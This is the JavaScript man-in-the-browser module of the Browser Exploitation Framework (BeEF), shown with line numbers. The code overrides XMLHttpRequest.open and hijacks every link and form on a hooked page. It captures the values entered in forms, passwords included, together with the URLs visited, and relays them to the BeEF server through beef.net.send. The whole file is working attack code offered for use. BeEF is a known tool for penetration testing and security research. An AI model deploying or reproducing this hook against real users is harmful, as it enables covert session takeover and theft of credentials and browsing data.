1
//
2
// Copyright (c) 2006-2025 Wade Alcorn - [email protected]
3
// Browser Exploitation Framework (BeEF) - https://beefproject.com
4
// See the file 'doc/COPYING' for copying permission
5
//
6

7
/**
8
 * @namespace beef.mitb
9
 */
10
beef.mitb = {
11

12
    cid:null,
13
    curl:null,
14

15
    /** Initializes */ 
16
    init:function (cid, curl) {
17
        beef.mitb.cid = cid;
18
        beef.mitb.curl = curl;
19
        /*Override open method to intercept ajax request*/
20
        var hook_file = "<%= @hook_file %>";
21

22
        if (window.XMLHttpRequest && !(window.ActiveXObject)) {
23

24
            beef.mitb.sniff("Method XMLHttpRequest.open override");
25
            (function (open) {
26
                XMLHttpRequest.prototype.open = function (method, url, async, mitb_call) {
27
                    // Ignore it and don't hijack it. It's either a request to BeEF (hook file or Dynamic Handler)
28
                    // or a request initiated by the MiTB itself.
29
                    if (mitb_call || (url.indexOf(hook_file) != -1 || url.indexOf("/dh?") != -1)) {
30
                        open.call(this, method, url, async, true);
31
                    }else {
32
                        var portRegex = new RegExp(":[0-9]+");
33
                        var portR = portRegex.exec(url);
34
                        var requestPort;
35
                        if (portR != null) { requestPort = portR[0].split(":")[1]; }
36

37
                        //GET request
38
                        if (method == "GET") {
39
                            //GET request -> cross-origin
40
                            if (url.indexOf(document.location.hostname) == -1 || (portR != null && requestPort != document.location.port )) {
41
                                beef.mitb.sniff("GET [Ajax CrossOrigin Request]: " + url);
42
                                window.open(url);
43
                            }else { //GET request -> same-origin
44
                                beef.mitb.sniff("GET [Ajax Request]: " + url);
45
                                if (beef.mitb.fetch(url, document.getElementsByTagName("html")[0])) {
46
                                    var title = "";
47
                                    if (document.getElementsByTagName("title").length == 0) {
48
                                        title = document.title;
49
                                    } else {
50
                                        title = document.getElementsByTagName("title")[0].innerHTML;
51
                                    }
52
                                    // write the url of the page
53
                                    history.pushState({ Be:"EF" }, title, url);
54
                                }
55
                            }
56
                        }else{
57
                            //POST request
58
                            beef.mitb.sniff("POST ajax request to: " + url);
59
                            open.call(this, method, url, async, true);
60
                        }
61
                    }
62
                };
63
            })(XMLHttpRequest.prototype.open);
64
        }
65
    },
66

67
    /** Initializes the hook on anchors and forms. */ 
68
    hook:function () {
69
        beef.onpopstate.push(function (event) {
70
            beef.mitb.fetch(document.location, document.getElementsByTagName("html")[0]);
71
        });
72
        beef.onclose.push(function (event) {
73
            beef.mitb.endSession();
74
        });
75

76
        var anchors = document.getElementsByTagName("a");
77
        var forms = document.getElementsByTagName("form");
78
        var lis = document.getElementsByTagName("li");
79

80
        for (var i = 0; i < anchors.length; i++) {
81
            anchors[i].onclick = beef.mitb.poisonAnchor;
82
        }
83
        for (var i = 0; i < forms.length; i++) {
84
            beef.mitb.poisonForm(forms[i]);
85
        }
86

87
        for (var i = 0; i < lis.length; i++) {
88
            if (lis[i].hasAttribute("onclick")) {
89
                lis[i].removeAttribute("onclick");
90
                /*clear*/
91
                lis[i].setAttribute("onclick", "beef.mitb.fetchOnclick('" + lis[i].getElementsByTagName("a")[0] + "')");
92
                /*override*/
93

94
            }
95
        }
96
    },
97

98
    /** Hooks anchors and prevents them from linking away */
99
    poisonAnchor:function (e) {
100
        try {
101
            e.preventDefault;
102
            if (beef.mitb.fetch(e.currentTarget, document.getElementsByTagName("html")[0])) {
103
                var title = "";
104
                if (document.getElementsByTagName("title").length == 0) {
105
                    title = document.title;
106
                } else {
107
                    title = document.getElementsByTagName("title")[0].innerHTML;
108
                }
109
                history.pushState({ Be:"EF" }, title, e.currentTarget);
110
            }
111
        } catch (e) {
112
            beef.debug('beef.mitb.poisonAnchor - failed to execute: ' + e.message);
113
        }
114
        return false;
115
    },
116

117
    /** Hooks forms and prevents them from linking away */
118
    poisonForm:function (form) {
119
        form.onsubmit = function (e) {
120

121
            // Collect <input> tags.
122
            var inputs = form.getElementsByTagName("input");
123
            var query = "";
124
            for (var i = 0; i < inputs.length; i++) {
125
                switch (inputs[i].type) {
126
                    case "submit":
127
                        break;
128
                    default:
129
                        query += inputs[i].name + "=" + inputs[i].value + '&';
130
                        break;
131
                }
132
            }
133

134
            // Collect selected options from the form.
135
            var selects = form.getElementsByTagName("select");
136
            for (var i = 0; i < selects.length; i++) {
137
                var select = selects[i];
138
                query += select.name + "=" + select.options[select.selectedIndex].value + '&';
139
            }
140

141
            // We should be gathering 'submit' inputs as well, as there are 
142
            // applications demanding this parameter.
143
            var submit = $j('*[type="submit"]', form);
144
            if(submit.length) {
145
                // Append name of the submit button/input.
146
                query += submit.attr('name') + '=' + submit.attr('value');
147
            }
148

149
            if(query.slice(-1) == '&') {
150
                query = query.slice(0, -1);
151
            }
152

153
            e.preventdefault;
154
            beef.mitb.fetchForm(form.action, query, document.getElementsByTagName("html")[0]);
155
            history.pushState({ Be:"EF" }, "", form.action);
156
            return false;
157
        }
158
    },
159

160
    /** Fetches a hooked form with AJAX */ 
161
    fetchForm:function (url, query, target) {
162
        try {
163
            var y = new XMLHttpRequest();
164
            y.open('POST', url, false, true);
165
            y.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
166
            y.onreadystatechange = function () {
167
                if (y.readyState == 4 && y.responseText != "") {
168
                    target.innerHTML = y.responseText;
169
                    setTimeout(beef.mitb.hook, 10);
170
                }
171
            };
172
            y.send(query);
173
            beef.mitb.sniff("POST: " + url + "[" + query + "]");
174
            return true;
175
        } catch (x) {
176
            return false;
177
        }
178
    },
179

180
    /** Fetches a hooked link with AJAX */
181
    fetch:function (url, target) {
182
        try {
183
            var y = new XMLHttpRequest();
184
            y.open('GET', url, false, true);
185
            y.onreadystatechange = function () {
186
                if (y.readyState == 4 && y.responseText != "") {
187
                    target.innerHTML = y.responseText;
188
                    setTimeout(beef.mitb.hook, 10);
189
                }
190
            };
191
            y.send(null);
192
            beef.mitb.sniff("GET: " + url);
193
            return true;
194
        } catch (x) {
195
            window.open(url);
196
            beef.mitb.sniff("GET [New Window]: " + url);
197
            return false;
198
        }
199
    },
200

201
    /** Fetches a window.location=http://domainname.com and setting up history */ 
202
    fetchOnclick:function (url) {
203
        try {
204
            var target = document.getElementsByTagName("html")[0];
205
            var y = new XMLHttpRequest();
206
            y.open('GET', url, false, true);
207
            y.onreadystatechange = function () {
208
                if (y.readyState == 4 && y.responseText != "") {
209
                    var title = "";
210
                    if (document.getElementsByTagName("title").length == 0) {
211
                        title = document.title;
212
                    }
213
                    else {
214
                        title = document.getElementsByTagName("title")[0].innerHTML;
215
                        }
216
                    history.pushState({ Be:"EF" }, title, url);
217
                    target.innerHTML = y.responseText;
218
                    setTimeout(beef.mitb.hook, 10);
219
                }
220
            };
221
            y.send(null);
222
            beef.mitb.sniff("GET: " + url);
223

224
        } catch (x) {
225
            // the link is cross-origin, so load the resource in a different tab
226
            window.open(url);
227
            beef.mitb.sniff("GET [New Window]: " + url);
228
        }
229
    },
230

231
    /** Relays an entry to the framework */
232
    sniff:function (result) {
233
        try {
234
            beef.net.send(beef.mitb.cid, beef.mitb.curl, result);
235
        } catch (x) {
236
        }
237
        return true;
238
    },
239

240
    /** Signals the Framework that the user has lost the hook */
241
    endSession:function () {
242
        beef.mitb.sniff("Window closed.");
243
    }
244
};
245

246
beef.regCmp('beef.mitb');
247

248